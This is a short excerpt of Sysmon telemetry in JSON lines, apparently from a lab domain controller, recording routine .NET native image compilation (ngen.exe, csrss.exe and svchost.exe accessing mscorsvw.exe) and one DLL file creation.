{"EventTime":"2020-08-01 08:06:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7737,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:22.522\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-00103FD80E00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:22.522","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-00103FD80E00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7738,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:22.522\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-00103FD80E00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:22.522","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-00103FD80E00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:22","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7739,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:22.538\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227E-5F25-0000-00103FD80E00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:22.538","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227E-5F25-0000-00103FD80E00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7740,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:23.038\r\nProcessGuid: {41C8662E-227E-5F25-0000-00103FD80E00}\r\nProcessId: 4092\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ffc-0\\System.Data.Services.Design.dll\r\nCreationUtcTime: 2020-08-01 08:06:23.038","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:23.038","ProcessGuid":"{41C8662E-227E-5F25-0000-00103FD80E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ffc-0\\System.Data.Services.Design.dll","CreationUtcTime":"2020-08-01 08:06:23.038","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7741,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:23.084\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-227F-5F25-0000-001018DD0E00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:23.084","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-227F-5F25-0000-001018DD0E00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7742,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:23.084\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-227F-5F25-0000-001018DD0E00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:23.084","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-227F-5F25-0000-001018DD0E00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7743,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:23.084\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227F-5F25-0000-001018DD0E00}\r\nTargetProcessId: 2952\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:23.084","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227F-5F25-0000-001018DD0E00}","TargetProcessId":"2952","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7744,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:23.147\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010CC630C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:23.147","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010CC630C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7745,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:23.147\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010CC630C00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:23.147","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010CC630C00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
